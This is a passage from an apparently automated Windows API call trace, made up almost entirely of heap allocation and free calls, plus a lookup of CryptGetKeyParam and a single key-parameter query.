0x9bd990 [0184.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0184.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0184.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0184.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0184.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0184.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0184.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0184.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0184.487] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0184.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0184.487] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd900 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0184.487] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0184.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0184.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0184.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0184.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0184.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0184.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0184.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0184.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0184.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0184.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0184.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0184.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0184.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0184.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0184.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0184.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0184.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0184.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0184.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0184.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0184.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0184.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0184.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0184.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0184.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0184.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0184.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0184.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0184.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0184.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0184.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0184.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0184.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0184.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0184.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0184.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0184.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0184.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0184.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.493] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0184.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0184.494] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2848, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2848*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0184.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0184.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0184.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: 